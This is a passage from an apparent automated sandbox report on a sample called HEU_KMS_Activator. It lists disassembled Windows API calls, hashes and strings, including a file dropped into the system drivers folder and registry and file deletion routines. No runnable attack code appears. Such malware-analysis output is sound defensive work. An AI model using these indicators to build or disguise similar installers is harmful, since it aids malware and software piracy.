    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
    • String ID:
    • API String ID: 2320649405-0
    • Opcode ID: 96801a186d4d115bb18627bb134db216860669d5f1e8eb8584970fd652ee8e40
    • Instruction ID: e63eed25e56d782685accc5c91989abb5efb90e386565a98e0fdbb75e57f7206
    • Opcode Fuzzy Hash: 96801a186d4d115bb18627bb134db216860669d5f1e8eb8584970fd652ee8e40
    • Instruction Fuzzy Hash: 1F116671504B046BD7319F64DA08B5BBFF8AF40715F04892DE885F2290D738DA48CB54
    APIs
    • lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
    • lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
    • lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
    • SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
      • Part of subcall function 004060EC: GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
      • Part of subcall function 004060EC: lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$lstrcatlstrlen$TextVersionWindow
    • String ID:
    • API String ID: 1396681732-0
    • Opcode ID: 872f70a858d90a245303d1bf7a4ce70b373770582009df378712df21ff0ed755
    • Instruction ID: 6464522b466e749fe96a3871e53ccf2ee938c0e2bdbd9c18f4052ca708d876f8
    • Opcode Fuzzy Hash: 872f70a858d90a245303d1bf7a4ce70b373770582009df378712df21ff0ed755
    • Instruction Fuzzy Hash: F12183B5900118BBDF119FA5DD80ADEBFB9EF45354F14807AFA04B6291C7398940DF68
    APIs
    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,00405F2E,00000000), ref: 00405D93
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00444380,40000000,00000004,00000000,?,00405F2E,00000000), ref: 00405DDB
    • lstrcatA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),00408CD4,00000000,00000000,?,00405F2E,00000000), ref: 00405DF6
    • lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),?,00405F2E,00000000), ref: 00405DFD
    • WriteFile.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),00000000,00405F2E,00000000,?,00405F2E,00000000), ref: 00405E10
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$CloseHandlePointerWritelstrcatlstrlen
    • String ID: RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\")
    • API String ID: 4073665932-605988816
    • Opcode ID: d1785a4c38b6b8c8c0830f9846d7b9c8c2475d8ac9ea87be8455ea3d857afc95
    • Instruction ID: bcb33ca6b367f22f7366290136dd08d80bbf25a7af1ec17152d3fcacb0cf22fe
    • Opcode Fuzzy Hash: d1785a4c38b6b8c8c0830f9846d7b9c8c2475d8ac9ea87be8455ea3d857afc95
    • Instruction Fuzzy Hash: 6401A171500B84ABD7206F74EE88957372CEB02775B20833BF5A5B01E0C7345899DE6D
    APIs
    • DestroyWindow.USER32(00000000,00000000), ref: 004030F9
    • GetTickCount.KERNEL32 ref: 00403117
    • wsprintfA.USER32 ref: 00403145
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
    • CreateDialogParamA.USER32(0000006F,00000000,00403065,00000000), ref: 00403169
    • ShowWindow.USER32(00000000,00000005), ref: 00403177
      • Part of subcall function 00403049: MulDiv.KERNEL32(00000000,00000064,00014079), ref: 0040305E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
    • String ID: ... %d%%
    • API String ID: 722711167-2449383134
    • Opcode ID: beaf7862a5aed15fe208e26664937f46a96558c09d32a1f4200973cd2793b316
    • Instruction ID: 3a1a2fd8f6bbef1dc8cfae20a61050b5f3bb6b0e4252654ed3a16937c041cbf9
    • Opcode Fuzzy Hash: beaf7862a5aed15fe208e26664937f46a96558c09d32a1f4200973cd2793b316
    • Instruction Fuzzy Hash: A90196B4502128EBC711AF60AD09EAF7E7CAF05B06B14413BF441F91E6DB785A41CB9D
    APIs
    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040460C
    • GetMessagePos.USER32 ref: 00404614
    • ScreenToClient.USER32(?,?), ref: 0040462E
    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404640
    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404666
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Message$Send$ClientScreen
    • String ID: f
    • API String ID: 41195575-1993550816
    • Opcode ID: 9421c974899feebdbb22c00208a95bc97dbb1d4c410463aa49b9d9c624697508
    • Instruction ID: 968be8fde76d460d0756b568e451f27ccf1c1fe4832d1bd21238342acfddc3c2
    • Opcode Fuzzy Hash: 9421c974899feebdbb22c00208a95bc97dbb1d4c410463aa49b9d9c624697508
    • Instruction Fuzzy Hash: DD018C71900218BADB00DBA4DD85FFFBBBCAF95B11F10012BBA00B61C0D6B899018BA4
    APIs
    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403080
    • wsprintfA.USER32 ref: 004030B4
    • SetWindowTextA.USER32(?,?), ref: 004030C4
    • SetDlgItemTextA.USER32(?,00000406,?), ref: 004030D6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Text$ItemTimerWindowwsprintf
    • String ID: unpacking data: %d%%$verifying installer: %d%%
    • API String ID: 1451636040-1158693248
    • Opcode ID: 7502cfacc4d6def781d356a6d2236211fde85066980af0568184a5fe613d57d1
    • Instruction ID: 0b0bd0e1e9b17ea34dbeb0e741569b2ce2a0adba8e267900c0c7db5628e2502f
    • Opcode Fuzzy Hash: 7502cfacc4d6def781d356a6d2236211fde85066980af0568184a5fe613d57d1
    • Instruction Fuzzy Hash: B6F031B150020CABEF209F51DD06BAE3B69EB40306F00C03EFA56B51D5CBB98A559F99
    APIs
    • CharNextA.USER32(?,*?|<>/":,00000000,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D3C
    • CharNextA.USER32(?,?,?,00000000), ref: 00405D49
    • CharNextA.USER32(?,0047B000,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D4E
    • CharPrevA.USER32(?,?,00471000,0047B000,00000000,00403719,0047B000,00000000,004038CD), ref: 00405D5E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Char$Next$Prev
    • String ID: *?|<>/":
    • API String ID: 589700163-165019052
    • Opcode ID: 3a24fa8c9006dac45d0a5d819a6ac61b56d5d325dd9aa9a76014649340cad8e3
    • Instruction ID: ea709fc9508d644880843fac25a8cdecd3d7eb099d5aa55eb3e96b44218fc408
    • Opcode Fuzzy Hash: 3a24fa8c9006dac45d0a5d819a6ac61b56d5d325dd9aa9a76014649340cad8e3
    • Instruction Fuzzy Hash: A611B261404F9429EB3226295C48F77AFD9CF96760F18807FE5D4722C2DA7C5C828E6D
    APIs
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
    • GlobalFree.KERNEL32(00000000), ref: 00402374
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FreeGloballstrcpyn
    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$Exch: stack < %d elements$Pop: stack empty
    • API String ID: 1459762280-2750407803
    • Opcode ID: 081fc835baee506785e643e9b7276423b68a0caccc4271b8c47c3d638c73222a
    • Instruction ID: 72d15ca93cccb4bd05205b79b1220d5ac80c59eb60c02eec345e36e7f5f91962
    • Opcode Fuzzy Hash: 081fc835baee506785e643e9b7276423b68a0caccc4271b8c47c3d638c73222a
    • Instruction Fuzzy Hash: BB218072514214EBD720AF59DE81A6F77A8FB08314714043FF552B32D2DB78A850EBAE
    APIs
    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 004014AA
    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 004014E6
    • RegCloseKey.ADVAPI32(?), ref: 004014EF
    • RegCloseKey.ADVAPI32(?), ref: 00401514
    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00401532
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Close$DeleteEnumOpen
    • String ID:
    • API String ID: 1912718029-0
    • Opcode ID: bedd1dd3781ce937ae06bee25c31ed97682a9129fae70240c9e5053e56a58e9e
    • Instruction ID: 46f9eb3ca8b9ce696386f4474674f490b6bf012e6f701dfe83673b0d13c3eec5
    • Opcode Fuzzy Hash: bedd1dd3781ce937ae06bee25c31ed97682a9129fae70240c9e5053e56a58e9e
    • Instruction Fuzzy Hash: 29113776500009FBDF12AFA0EE859AF3BB9EB84349F10403AFA46B5170D7348E549F68
    APIs
    • GetFileVersionInfoSizeA.VERSION(00000000,?), ref: 004022FB
    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 0040231B
    • GetFileVersionInfoA.VERSION(?,?,00000000,00000000), ref: 00402332
    • VerQueryValueA.VERSION(?,00408514,?,?,?,?,00000000,00000000), ref: 0040234B
      • Part of subcall function 00405C1F: wsprintfA.USER32 ref: 00405C2C
    • GlobalFree.KERNEL32(00000000), ref: 00402374
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
    • String ID:
    • API String ID: 3376005127-0
    • Opcode ID: 753314d5b84c36a831c964e5400e8f93d4fbddc243ce663de5bcfa9a04db6bcf
    • Instruction ID: bb743333a9d53ab0ed931c2f46d389a625a834a3ed0778c8e8866ce47ca33a9a
    • Opcode Fuzzy Hash: 753314d5b84c36a831c964e5400e8f93d4fbddc243ce663de5bcfa9a04db6bcf
    • Instruction Fuzzy Hash: 75115E32900118AFDB01AFA5CD45CDE7BB9EF04354B10407AF505B61E1DB788A40EB68
    APIs
    • GetDlgItem.USER32(?), ref: 0040207E
    • GetClientRect.USER32(00000000,?), ref: 0040208B
    • LoadImageA.USER32(?,00000000,?,?,?,00000010), ref: 004020AD
    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 004020BB
    • DeleteObject.GDI32(00000000), ref: 004020CA
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
    • String ID:
    • API String ID: 1849352358-0
    • Opcode ID: 1097cd964c9183fee2a3b739dadcb9b2a8334bab65d566d47ca60a7f6b6bf62a
    • Instruction ID: 9cbf1ec671b7c9279e85288b73d3c04a1680faf79f29543d5388d0ed6f7c421c
    • Opcode Fuzzy Hash: 1097cd964c9183fee2a3b739dadcb9b2a8334bab65d566d47ca60a7f6b6bf62a
    • Instruction Fuzzy Hash: 3CF0FF72540504AFD701DBA4EE88DBFB7BCFB44341B11443AF601F61A1DA349D419B28
    APIs
    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FBD
    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401FD5
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSend$Timeout
    • String ID: !
    • API String ID: 1777923405-2657877971
    • Opcode ID: 711be58800e805ecb6d7b188a1a3b1d34c63471b69e6b862fa27ab3b5b537876
    • Instruction ID: 7ac8d78af794401246d7202aea648043024fecf56a2fdbfe3772f4bf061bebfa
    • Opcode Fuzzy Hash: 711be58800e805ecb6d7b188a1a3b1d34c63471b69e6b862fa27ab3b5b537876
    • Instruction Fuzzy Hash: AB219171940208AEDF15AFB4D946AEE7BB4EF04348F20807EF602F71E1C6784680DB98
    APIs
    • lstrlenA.KERNEL32(004329D8,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,004329D8,?), ref: 00404207
    • wsprintfA.USER32 ref: 0040420F
    • SetDlgItemTextA.USER32(?,004329D8,000000DF), ref: 00404222
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ItemTextlstrlenwsprintf
    • String ID: %u.%u%s%s
    • API String ID: 3540041739-3551169577
    • Opcode ID: 9b6ccf10e7da3be1f64962dccce0f98430dc3013797c6c0db80127e7827a7469
    • Instruction ID: 2e0a2fd9739ff2f37b171b446d8de6aff9e5b1524a652bfffe6c0ede5d09b280
    • Opcode Fuzzy Hash: 9b6ccf10e7da3be1f64962dccce0f98430dc3013797c6c0db80127e7827a7469
    • Instruction Fuzzy Hash: 3411BDB27002147BDB10EA698C05E8F7A5EDBD5330F10423BF119F31D0E6398A1242A8
    APIs
      • Part of subcall function 0040153E: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,?,?), ref: 00401578
    • RegCloseKey.ADVAPI32(00000000), ref: 004027CC
    • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 004027AC
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    Strings
    • DeleteRegValue: "%s\%s" "%s", xrefs: 004027BE
    • DeleteRegKey: "%s\%s", xrefs: 004027E2
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
    • API String ID: 1697273262-1764544995
    • Opcode ID: b4a9548ae85fb6a48f609ff3661550b915ed0291b3bd89f7fba5d7a8495d9b30
    • Instruction ID: 66dcd731f04371848a62b5b490c12eb96f54ccb54610c652a47dfce0b6bddbd9
    • Opcode Fuzzy Hash: b4a9548ae85fb6a48f609ff3661550b915ed0291b3bd89f7fba5d7a8495d9b30
    • Instruction Fuzzy Hash: 77119132900114ABCB10BFA5DD8AAAF7AA4EF40758F10803FF505BB1D1DA794A509B9D
    APIs
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
      • Part of subcall function 00405F2F: FindFirstFileA.KERNELBASE(?,0043D238,0043AA38,0040605F,0043AA38), ref: 00405F3A
      • Part of subcall function 00405F2F: FindClose.KERNELBASE(00000000), ref: 00405F46
    • lstrlenA.KERNEL32 ref: 0040265B
    • lstrlenA.KERNEL32(?), ref: 00402665
    • SHFileOperationA.SHELL32(?,?,?,?), ref: 0040268D
    Strings
    Memory Dump Source
